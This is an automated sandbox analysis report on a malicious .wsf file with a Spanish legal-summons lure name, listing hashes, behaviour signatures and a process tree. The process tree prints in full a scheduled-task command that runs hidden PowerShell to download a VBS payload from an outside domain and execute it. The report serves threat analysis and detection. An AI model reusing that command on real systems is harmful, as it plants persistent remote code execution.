Analysis
-
max time kernel
343s -
max time network
346s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
27/09/2022, 06:42
Static task
static1
Behavioral task
behavioral1
Sample
Denuncia en su contra y detalles de la citacion.wsf
Resource
win7-20220812-en
General
-
Target
Denuncia en su contra y detalles de la citacion.wsf
-
Size
171KB
-
MD5
abba9bfa9425c66df09fe00a63876ece
-
SHA1
3c2e055f21cdb118619497f70e4a6882265c7ef8
-
SHA256
c738d9ae6eec6bb34b54cf66de709a61c6c7d22d98d8762fdf6b5b5b9c48021b
-
SHA512
31bfa060814416d73b0fd5de00c09491b4386bea8a036c248b27de04f96f17de2068538d627dca756bad52f6347d1ce4b5106a01d7e1cdbff3569d3e4f63ce3f
-
SSDEEP
48:oyRZ4meLOL8GELn2HH+ukgSHoUFIgEciIZJ9GFnFqFTF8RZFnFDwF4FuFMFZF/yu:oi4meawMkg0LFIguSJERt+UZ6K8y
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1148 1364 schtasks.exe 27 -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\taskschd.msc mmc.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1148 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1500 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1064 mmc.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe Token: 33 1064 mmc.exe Token: SeIncBasePriorityPrivilege 1064 mmc.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1064 mmc.exe 1064 mmc.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1548 wrote to memory of 1500 1548 taskeng.exe 32 PID 1548 wrote to memory of 1500 1548 taskeng.exe 32 PID 1548 wrote to memory of 1500 1548 taskeng.exe 32
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Denuncia en su contra y detalles de la citacion.wsf"1⤵PID:1944
-
C:\Windows\system32\schtasks.exeschtasks /create /sc MINUTE /mo 5 /tn "OneDrive Reporting Tas" /tr "\"%windir%\system32\WindowsPowershell\v1.0\powershell.exe\" -Windowstyle Hidden $a = wget 'https://notificacionesdelafiscalia.com/t52ph4t' -o C:\Windows\Temp\t.vbs;start-sleep 5;start-Process C:\Windows\Temp\t.vbs" /F1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1148
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s1⤵
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1064
-
C:\Windows\system32\taskeng.exetaskeng.exe {7F8BACB4-89A1-4004-B080-CED057815914} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\system32\WindowsPowershell\v1.0\powershell.exeC:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -Windowstyle Hidden $a = wget "https://notificacionesdelafiscalia.com/t52ph4t" -o C:\Windows\Temp\t.vbs;start-sleep 5;start-Process C:\Windows\Temp\t.vbs2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1500
-